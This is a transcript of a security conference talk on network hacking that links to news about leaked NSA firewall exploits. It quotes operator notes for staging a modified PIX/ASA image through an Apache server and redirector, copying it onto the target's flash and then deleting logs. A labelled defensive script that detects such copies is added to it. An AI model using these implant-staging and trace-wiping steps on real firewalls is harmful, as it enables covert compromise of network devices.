SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell and Wayne Burke


Upload: ec-council

Post on 14-Jan-2017

TRANSCRIPT

Page 1: SWAT Style – Live Network Crypto Hacking and Exploitation by Kevin Cardwell and Wayne Burke

Presenters: Kevin Cardwell & Wayne Burke

Network Crypto Hacking:

Page 2:

http://thehackernews.com/2016/09/xiaomi-android-backdoor.html

Page 3:

https://securelist.com/blog/incidents/75812/the-equation-giveaway/

Page 4:

http://thehackernews.com/2016/08/nsa-hacking-tools.html

Page 5:

http://thehackernews.com/2016/08/nsa-hack-russia-leak.html

Page 6:

http://thehackernews.com/2016/08/nsa-hack-exploit.html

Page 7:

http://thehackernews.com/2016/08/cisco-firewall-hack.html

Page 8:

http://thehackernews.com/2015/10/nsa-crack-encryption.html

Mystery Solved ??

Page 9:

https://twitter.com/SilentSignalHU/status/768095445444861952?ref_src=twsrc%5Etfw

Page 10:

Diving into tactics:

• In the next few slides we will review some detailed real simple tactics.

• The ultimate goal of eventually owning your entire environment.

Page 11:

# Before you even get to the op, you need to create a PIX/ASA IOS image,
# key it, and test it. Bring the image and the key to the op.

########## How to get Apache installed on the ops station ##########
# cd to the Apache tools directory
cd /current/bin/FW/Tools/Apache

# Run this first to get the RPM to install without issue
rpm -e httpd httpd-suexec mod_ssl apr-util

# Run this next to load apache rpm's
rpm -hiv *.rpm

# In this directory are modified versions of the config files
cp httpd.conf /etc/httpd/conf/httpd.conf
cp ssl.conf /etc/httpd/conf.d/ssl.conf

Apache Implant – Staging your Hack

Page 12:

# Create a test html file
echo "<html><body>This is a test</body></html>" > /var/www/html/index.html

# Put the image file you want to up/download into this directory with a
# common name:
cp /mnt/zip/<project>.<ip>_bg2011_pix633.bin /var/www/html/pix633.bin

# Set permissions for items in html directory
chmod 744 /var/www/html/*

# Start up the apache server
service httpd start

# Start up your browser to verify it works.
# You should get a pop-up asking to verify the ssl cert.
# Then you'll get the index.html page which will say "This is a test".
firefox https://127.0.0.1:4443 &

Page 13:

# Setup a remote listener on 443 on redirector to hit apache on 4443
-tunnelr 443 127.0.0.1 4443

# Now you are ready to go to the target pix and run this command
copy https://<ip of redirector>:<port if !443>/<name of image file> flash

# Log off of the pix
exit

Page 14:

######## Getting Ops Station Back to normal ########
# Once the upload is done, stop apache
service httpd stop

# Remove installed rpm's
rpm -e httpd httpd-suexec mod_ssl apr-util

# Then you need to remove any directories still remaining.
rm -rf /var/log/httpd /etc/httpd /var/www

#### OTHER INFO ####
# To install apache, you need 3 rpm's:
# httpd-2.0.52-19.ent.i386.rpm
# httpd-suexec-2.0.52-19.ent.i386.rpm
# mod_ssl-2.0.52-19.ent.i386.rpm
# apr-util-0.9.4-17.i386.rpm
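
A detection-side example for the procedure above, added here and not part of the original slides or the notes they quote: it scans firewall command-audit syslog for `copy <url> flash` image transfers and marks those whose source is not an approved image server. The 111008-style message format, the approved host, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumed format: Cisco command-audit event 111008,
# "User '<name>' executed the '<command>' command."
AUDIT_RE = re.compile(
    r"%(?:PIX|ASA)-\d-111008: User '(?P<user>[^']*)' "
    r"executed the '(?P<cmd>.*)' command"
)
# The transfer shape from the notes: copy <scheme>://host[:port]/file flash
COPY_RE = re.compile(
    r"^copy\s+(?P<url>(?:https?|ftp|tftp)://\S+)\s+(?P<dest>(?:flash|disk\d)\S*)$",
    re.IGNORECASE,
)
APPROVED_IMAGE_HOSTS = {"10.20.0.15"}  # hypothetical internal image server

# Constructed sample lines, not taken from a real device.
SAMPLE_LOG = [
    "Sep 12 02:14:07 fw01 %ASA-5-111008: User 'enable_15' executed the "
    "'copy https://198.51.100.7:8443/pix633.bin flash' command.",
    "Sep 12 02:14:55 fw01 %ASA-5-111008: User 'enable_15' executed the "
    "'show version' command.",
    "Sep 13 10:01:12 fw01 %ASA-5-111008: User 'netops' executed the "
    "'copy tftp://10.20.0.15/asa-approved.bin flash:' command.",
    "Sep 13 10:05:40 fw01 %ASA-5-111008: User 'netops' executed the "
    "'copy running-config startup-config' command.",
]

def find_remote_image_copies(lines, approved=APPROVED_IMAGE_HOSTS):
    """Return one record per audited 'copy <url> flash' command."""
    findings = []
    for line in lines:
        audit = AUDIT_RE.search(line)
        copy = COPY_RE.match(audit["cmd"].strip()) if audit else None
        if not copy:
            continue  # not an audit event, or not a URL-to-flash copy
        url = urlsplit(copy["url"])
        findings.append({
            "user": audit["user"],
            "host": url.hostname,
            "port": url.port,  # None when the URL uses the default port
            "file": url.path.rsplit("/", 1)[-1],
            "dest": copy["dest"],
            "approved_source": url.hostname in approved,
        })
    return findings

if __name__ == "__main__":
    for f in find_remote_image_copies(SAMPLE_LOG):
        if not f["approved_source"]:
            print("ALERT: image pulled from unapproved host:", f)
```
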

Page 15:

Scripting the implant:

Page 16:
Page 17:
Page 18:

Game: What does a Hacker See …… …… ?

when using a very cheap single board mobile ARM device…

Let's role play

Page 19:

No Not The APPLE …… Ꙭ

Mobile Assault Kit www.csiswat.com

Page 20:

Sample Commercial Products

• PWN PLUG V4 Latest - $1,095.00 – Expensive Open Source Support!!

Page 21:

Can we do better for less?

• Our MAK Base 1 or 2:

Page 22:

A flying Heli IMSI Catcher / Stingray Homemade with BladeRF SDR

Page 23:

Thanks for listening

Wayne Burke: [email protected]

Kevin Cardwell: [email protected]